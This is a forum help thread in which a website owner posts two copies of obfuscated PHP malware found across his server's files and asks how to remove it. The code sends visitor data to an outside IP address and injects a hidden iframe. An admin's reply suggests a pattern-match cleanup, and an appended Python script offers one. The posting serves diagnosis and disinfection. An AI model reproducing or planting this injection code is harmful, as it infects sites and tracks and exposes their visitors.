How do I remove this Malware?

Discussion in 'Malware Help (A Specialist Will Reply)' started by MrCanuck, Aug 31, 2013.

  1. MrCanuck

    MrCanuck Private E-2

    I have a server at GoDaddy and I have about 6 different websites on it.

    I have malware on all the files (thousands) throughout the server.

    Normally I would just download all the files and then do a "search and replace" ALL in Dreamweaver and get rid of the malicious code in all the files.

    However, the problem with this one is that each malicious code is different for each file.

    Below you will see the malicious code from two separate PHP files on my site. The text in "green" is where it is different in every file.

    Any way to remove this without having to go through thousands of files 1 by 1?

    Code:
    <?php /*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
    <script type='text/javascript'>##JS##if (typeof KDDRTFGEG == 'undefined' && typeof f2 != 'undefined') {var it=f2().split('|');var dkm='';for (i=0;i<it.length;i++)dkm+=f1((it[i]-67)>>1);document.write("<iframe src='"+dkm+"' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
    AOLEW;
    $asd = preg_replace('/<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->(.*?)<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->/i', '', $asd); $sess_id = empty($_COOKIE['PHP_SESSION_ID']) ? 0 : intval($_COOKIE['PHP_SESSION_ID']); $sdf='';if ($sess_id < 2) $sdf = file_get_contents('[COLOR="Lime"]http://82.200.204.155/tmp/jquery.js?96=67&3be61b7b='.base64_encode[/COLOR]($_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'|'.$_SERVER['HTTP_USER_AGENT']).'&fid=1fad2e56559d7f5e572cbe4200bac834'); if (!empty($sdf)) $sdf.= "var exdate=new Date();exdate.setDate(exdate.getDate() + 14);document.cookie='PHP_SESSION_ID=".(++$sess_id)."; expires='+exdate.toUTCString();"; return str_replace('</body>', str_replace('##JS##', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/ ?>
    Code:
    <?php /*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
    <script type='text/javascript'>##JS##if (typeof KDDRTFGEG == 'undefined' && typeof f2 != 'undefined') {var it=f2().split('|');var dkm='';for (i=0;i<it.length;i++)dkm+=f1((it[i]-55)>>1);document.write("<iframe src='"+dkm+"' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
    AOLEW;
    $asd = preg_replace('/<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->(.*?)<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->/i', '', $asd); $sess_id = empty($_COOKIE['PHP_SESSION_ID']) ? 0 : intval($_COOKIE['PHP_SESSION_ID']); $sdf='';if ($sess_id < 2) $sdf = file_get_contents('[COLOR="Lime"]http://82.200.204.155/tmp/jquery.js?968=55&9a='.base64_encode[/COLOR]($_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'|'.$_SERVER['HTTP_USER_AGENT']).'&fid=1fad2e56559d7f5e572cbe4200bac834'); if (!empty($sdf)) $sdf.= "var exdate=new Date();exdate.setDate(exdate.getDate() + 14);document.cookie='PHP_SESSION_ID=".(++$sess_id)."; expires='+exdate.toUTCString();"; return str_replace('</body>', str_replace('##JS##', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/ ?>
     
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!

Infections like this in website coding are not something we can really help you with unless you have an antivirus program that can scan and repair the files, which is unlikely in most cases. Restoring from backups would be the easiest solution if you have them. Otherwise you would need to create a script to manually search and replace the problem strings in all the files. You could possibly use a program like sed (stream editor) to do this. In both of your examples, the problem occurs in between this string

    $sdf = file_get_contents('

    and this string

    ($_SERVER['REMOTE_ADDR']

    You would have to create a script using a pattern match to replace everything in between those patterns with what you want to be there.
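A worked version of the scripted search-and-replace described in the reply above, added here as an example and not code from the thread. It assumes Python 3 on the machine holding a downloaded copy of the site, and it keys on the opening and closing marker comments that wrap the injected block (`<?php /*<marker>*/ ... /*<marker>*/ ?>`) rather than on the content between them, which is the part that differs per file. The sample input is constructed with a placeholder URL and a made-up marker; the indicator strings come from the posted code.

```python
import os
import re
from typing import Dict, Tuple

# The injected block opens with "<?php /*<marker>*/" and closes with
# "/*<same marker>*/ ?>". The backreference \1 requires the closing comment to
# repeat the opening token, so any marker value is handled and the per-file
# differences in between (the "green" parts) do not matter.
INJECT_RE = re.compile(
    r"<\?php\s*/\*([0-9A-Za-z]{24,})\*/"   # opening tag plus marker comment
    r".*?"                                  # injected payload, differs per file
    r"/\*\1\*/\s*\?>[ \t]*\r?\n?",          # matching closing marker and tag
    re.DOTALL,
)

# Strings from the posted sample that should not survive in a cleaned file.
# If one does, the block did not match cleanly (truncated or mutated variant)
# and that file needs a manual look.
INDICATORS = ("_shutdown_function", "##JS##", "HDDD467FFEY322")


def strip_injection(source: str) -> Tuple[str, int]:
    """Remove every matched block; return (cleaned_source, blocks_removed)."""
    return INJECT_RE.subn("", source)


def needs_manual_review(source: str) -> bool:
    """True when indicator strings remain after cleaning."""
    return any(token in source for token in INDICATORS)


def clean_tree(root: str, exts=(".php", ".html", ".htm"),
               dry_run: bool = True) -> Dict[str, Tuple[int, bool]]:
    """Walk root and return {path: (blocks_removed, needs_review)}.

    With dry_run=True nothing is written. Otherwise the infected original is
    kept beside the cleaned file as <name>.infected for later forensics.
    """
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                original = fh.read()
            cleaned, removed = strip_injection(original)
            review = needs_manual_review(cleaned)
            if removed == 0 and not review:
                continue
            report[path] = (removed, review)
            if removed and not dry_run:
                os.replace(path, path + ".infected")
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(cleaned)
    return report


# Constructed sample (not the thread's code): same structure, placeholder URL,
# made-up marker token.
MARKER = "a1b2c3d4e5f60718293a4b5c6d7e8f90abcdef0123456789"
INJECTED = (
    "<?php /*" + MARKER + "*/if (!defined('HDDD467FFEY322')){"
    "function _shutdown_function($asd){$write =<<<AOLEW\n"
    "<script type='text/javascript'>##JS##</script>\n"
    "AOLEW;\n"
    "$asd = preg_replace('/<!--" + MARKER + "-->(.*?)<!--" + MARKER + "-->/i', '', $asd);"
    "$sdf = file_get_contents('http://placeholder.invalid/tmp/jquery.js?96=67');"
    "return str_replace('</body>', str_replace('##JS##', $sdf, $write) . '</body>', $asd);}"
    "if (function_exists('ob_start')) ob_start('_shutdown_function', 0, true);"
    "define('HDDD467FFEY322', 1);}/*" + MARKER + "*/ ?>\n"
)
LEGIT = "<?php\n// site code (constructed)\necho 'hello';\n"
SAMPLE_INFECTED = INJECTED + LEGIT
# Truncated variant: the marker opens but the closing comment never appears.
SAMPLE_TRUNCATED = INJECTED[: len(INJECTED) // 2] + LEGIT

if __name__ == "__main__":
    import sys
    args = [a for a in sys.argv[1:] if a != "--write"]
    root = args[0] if args else "."
    for path, (removed, review) in clean_tree(root, dry_run="--write" not in sys.argv).items():
        print(f"{path}: removed={removed} review={review}")
```

Run it against the downloaded copy first without `--write` to get a list of affected files, then with `--write` to clean them; files reported with `review=True` were not matched by the marker pattern and should be opened by hand before the cleaned tree is uploaded.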
     
  3. MrCanuck

    MrCanuck Private E-2

    Thank you for the reply and the advice. I will look in to your suggestions. Thanks again.
     
  4. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome. Good luck.
     
